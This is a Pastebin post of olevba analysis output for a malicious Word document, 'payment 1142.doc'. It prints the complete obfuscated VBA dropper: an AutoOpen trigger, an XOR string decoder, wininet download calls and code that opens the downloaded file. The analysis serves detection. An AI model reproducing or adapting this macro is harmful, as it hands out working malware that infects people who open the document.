SHARE
TWEET

Malicious Word macro

dynamoo Mar 25th, 2015 369 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- payment 1142.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: payment 1142.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: payment 1142.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. HAZ82771
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module4.bas
  27. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module4'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. '*3
  30. Public Const HAZ82774 = "1E1002035E597C29373725252A76591C1B01061203137D307B3C2A3A2A36545D120159170615352379607678262054"
  31. '*4
  32. Public Const HAZ82773 = "2507041A14023A2A317D023F2F3D620A0510131E2B1439213527"
  33. '*5
  34. Public Const HAZ82772 = "svdvsdvSDVSDVCX1"
  35.  
  36. Sub HAZ82771()
  37. HONOOROA
  38. End Sub
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  47. ANALYSIS:
  48. +------------+----------------+-----------------------------------------+
  49. | Type       | Keyword        | Description                             |
  50. +------------+----------------+-----------------------------------------+
  51. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  52. |            |                | be used to obfuscate strings (option    |
  53. |            |                | --decode to see all)                    |
  54. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  55. |            |                | may be used to obfuscate strings        |
  56. |            |                | (option --decode to see all)            |
  57. +------------+----------------+-----------------------------------------+
  58. -------------------------------------------------------------------------------
  59. VBA MACRO Module11.bas
  60. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module11'
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62. '* 1
  63. Public Const HAZ82776 = "250C131F08581234263F2D35222C581C18"
  64.  
  65. '*2
  66. Public Const HAZ82775 = "2A17191F081D362A677D76787B76540B13"
  67. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  68. ANALYSIS:
  69. +------------+-------------+-----------------------------------------+
  70. | Type       | Keyword     | Description                             |
  71. +------------+-------------+-----------------------------------------+
  72. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  73. |            |             | be used to obfuscate strings (option    |
  74. |            |             | --decode to see all)                    |
  75. +------------+-------------+-----------------------------------------+
  76. -------------------------------------------------------------------------------
  77. VBA MACRO Module1.bas
  78. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module1'
  79. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  80. ' (File name: AddNewSheet.bas)
  81. ' Author: SENOO, Ken
  82. ' LICENSE: CC0
  83. ' (Last update: 2015-03-10T18:38+09:00)
  84.  
  85. Sub AddNewSheet(sheet_name)
  86.  
  87. ' csss
  88. For Each ws In Worksheets
  89.   If ws.Name = sheet_name Then
  90.     Application.DisplayAlerts = False
  91.     ws.Delete
  92.     Application.DisplayAlerts = True
  93.   End If
  94. Next ws
  95.  
  96. ' cscc
  97. Sheets.Add(After:=ActiveSheet).Name = sheet_name
  98.  
  99. End Sub
  100. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  101. ANALYSIS:
  102. No suspicious keyword or IOC found.
  103. -------------------------------------------------------------------------------
  104. VBA MACRO UFO.frm
  105. in file: payment 1142.doc - OLE stream: u'Macros/VBA/UFO'
  106. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  107. (empty macro)
  108. -------------------------------------------------------------------------------
  109. VBA MACRO Class1.cls
  110. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Class1'
  111. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  112. (empty macro)
  113. -------------------------------------------------------------------------------
  114. VBA MACRO Module3.bas
  115. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module3'
  116. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  117. Option Explicit
  118.  
  119.  
  120. Private Const KAIIOOOO872 = 8162
  121. Private Const KAIIOOOO871 As String = "KAIIOOOO871"
  122. Private Const KAIIOOOO999 = 1
  123. Private Const cCCc = &H4000000
  124. Public Function SOLOMKA110(ByVal sURL As String, ByVal sFileName As String) As Boolean
  125.     #If VBA7 And Win64 Then
  126.         Dim HCDNNNDCNNDC2 As LongPtr, KAIIOOOO873 As LongPtr
  127.     #Else
  128.         Dim HCDNNNDCNNDC2 As Long, KAIIOOOO873 As Long
  129.     #End If
  130.     Dim CDSFDFD As Long
  131.     Dim HCDNNNDCNNDC As String * KAIIOOOO872, KAIIOOOO874 As String
  132.     Dim VVzzVz As Integer, dData As Double
  133.     HCDNNNDCNNDC2 = SOLOMKA110222(KAIIOOOO871, KAIIOOOO999, vbNullString, vbNullString, 0)
  134.     If HCDNNNDCNNDC2 = 0 Then
  135.         Exit Function
  136.     End If
  137.     KAIIOOOO873 = SOLOMKA1102(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
  138.     If KAIIOOOO873 = 0 Then
  139.         dData = 0
  140.     Else
  141.         KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
  142.         KAIIOOOO874 = HCDNNNDCNNDC
  143.         Do While CDSFDFD <> 0
  144.             KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
  145.            
  146.             Dim HhhhhHHuuU73772 As Integer
  147. For HhhhhHHuuU73772 = 0 To 0
  148. If HhhhhHHuuU73772 = 5 Then End
  149. Next HhhhhHHuuU73772
  150.            
  151.             KAIIOOOO874 = KAIIOOOO874 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
  152.         Loop
  153.         dData = Len(KAIIOOOO874): VVzzVz = FreeFile
  154.         Open sFileName For Binary Access Write Lock Write As #VVzzVz
  155.         Put #VVzzVz, , KAIIOOOO874: Close #VVzzVz
  156.     End If
  157.     SOLOMKA1102222 KAIIOOOO873
  158.     SOLOMKA1102222 HCDNNNDCNNDC2
  159.     KAIIOOOO874 = ""
  160.     If dData Then
  161.         SOLOMKA110 = True
  162.     End If
  163. End Function
  164. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  165. ANALYSIS:
  166. +------------+-------------+-----------------------------------------+
  167. | Type       | Keyword     | Description                             |
  168. +------------+-------------+-----------------------------------------+
  169. | Suspicious | Open        | May open a file                         |
  170. | Suspicious | Write       | May write to a file (if combined with   |
  171. |            |             | Open)                                   |
  172. | Suspicious | Put         | May write to a file (if combined with   |
  173. |            |             | Open)                                   |
  174. | Suspicious | Binary      | May read or write a binary file (if     |
  175. |            |             | combined with Open)                     |
  176. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  177. |            |             | be used to obfuscate strings (option    |
  178. |            |             | --decode to see all)                    |
  179. +------------+-------------+-----------------------------------------+
  180. -------------------------------------------------------------------------------
  181. VBA MACRO Module2.bas
  182. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module2'
  183. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  184.  
  185. #If VBA7 And Win64 Then
  186. Public Declare PtrSafe Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  187. Public Declare PtrSafe Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  188. Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  189. Public Declare PtrSafe Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  190. #Else
  191. Public Declare Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  192. Public Declare Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  193. Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  194. Public Declare Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  195. #End If
  196.  
  197.  
  198. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  199. ANALYSIS:
  200. +------------+----------------+-----------------------------------------+
  201. | Type       | Keyword        | Description                             |
  202. +------------+----------------+-----------------------------------------+
  203. | Suspicious | Lib            | May run code from a DLL                 |
  204. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  205. |            |                | be used to obfuscate strings (option    |
  206. |            |                | --decode to see all)                    |
  207. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  208. |            |                | may be used to obfuscate strings        |
  209. |            |                | (option --decode to see all)            |
  210. | IOC        | wininet.dll    | Executable file name                    |
  211. +------------+----------------+-----------------------------------------+
  212. -------------------------------------------------------------------------------
  213. VBA MACRO Module5.bas
  214. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module5'
  215. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  216.  
  217.  
  218. Sub _
  219. HONOOROA()
  220. '* cASCAccaCACA
  221. Dim _
  222. HAZ82769
  223. Dim SiCoUnT As Integer
  224.  
  225. Dim VgdgHH333jKKkllKAHNXNHHGDG87293 As Long
  226. For VgdgHH333jKKkllKAHNXNHHGDG87293 = 17 To 20
  227. SiCoUnT = VgdgHH333jKKkllKAHNXNHHGDG87293 + 1
  228. Next VgdgHH333jKKkllKAHNXNHHGDG87293
  229.  
  230. Set HAZ82769 = CreateObject _
  231. (STOP7777777777 _
  232. (HAZ82772, HAZ82773))
  233. Dim HAZ82768
  234. Const HAZ82768ID = 2
  235. Dim JHAIICENAU019 As Integer
  236. For JHAIICENAU019 = 0 To 0
  237. If JHAIICENAU019 = 5 Then End
  238. Next JHAIICENAU019
  239. Set HAZ82768 = HAZ82769.GetSpecialFolder _
  240. (HAZ82768ID)
  241. Dim chdhai93 As Integer
  242. For chdhai93 = 0 To 0
  243. If chdhai93 = 5 Then End
  244. Next chdhai93
  245. HAZ82767 = HAZ82768 & STOP7777777777 _
  246. (HAZ82772, HAZ82775)
  247. Dim hiaopen847 As Integer
  248. For hiaopen847 = 0 To 0
  249. If hiaopen847 = 5 Then End
  250. Next hiaopen847
  251. Set HAZ82769 = CreateObject _
  252. (STOP7777777777 _
  253. (HAZ82772, HAZ82773))
  254. Dim BnBnHgs346 As Integer
  255. For BnBnHgs346 = 0 To 0
  256. If BnBnHgs346 = 5 Then End
  257. Next BnBnHgs346
  258. If HAZ82769.FileExists _
  259. (HAZ82767) Then
  260. HAZ82769. _
  261. DeleteFile HAZ82767
  262. End If
  263. If SOLOMKA110(STOP7777777777 _
  264. (HAZ82772, HAZ82774), HAZ82767) Then
  265. End If
  266. Set SSSS = Nothing
  267. If HAZ82769. _
  268. FileExists _
  269. (HAZ82767) Then
  270. End If
  271. Set SASASA = CreateObject _
  272. (STOP7777777777 _
  273. (HAZ82772, HAZ82776))
  274. SASASA.Open HAZ82767
  275. End Sub
  276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  277. ANALYSIS:
  278. +------------+--------------+-----------------------------------------+
  279. | Type       | Keyword      | Description                             |
  280. +------------+--------------+-----------------------------------------+
  281. | Suspicious | CreateObject | May create an OLE object                |
  282. | Suspicious | Open         | May open a file                         |
  283. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  284. |            |              | be used to obfuscate strings (option    |
  285. |            |              | --decode to see all)                    |
  286. +------------+--------------+-----------------------------------------+
  287. -------------------------------------------------------------------------------
  288. VBA MACRO Module6.bas
  289. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module6'
  290. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  291. Option Explicit
  292.  
  293. Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
  294.     Dim asasas1 As Long
  295.     Dim asasas1O As String
  296.     Dim asasas10 As Integer
  297.     Dim asasas101 As Integer
  298.     For asasas1 = 1 To (Len(STOP77777777) / 2)
  299.         asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
  300.         asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
  301.         asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
  302.     Next asasas1
  303.    STOP7777777777 = asasas1O
  304. End Function
  305. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  306. ANALYSIS:
  307. +------------+-------------+-----------------------------------------+
  308. | Type       | Keyword     | Description                             |
  309. +------------+-------------+-----------------------------------------+
  310. | Suspicious | Chr         | May attempt to obfuscate specific       |
  311. |            |             | strings                                 |
  312. | Suspicious | Xor         | May attempt to obfuscate specific       |
  313. |            |             | strings                                 |
  314. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  315. |            |             | be used to obfuscate strings (option    |
  316. |            |             | --decode to see all)                    |
  317. +------------+-------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top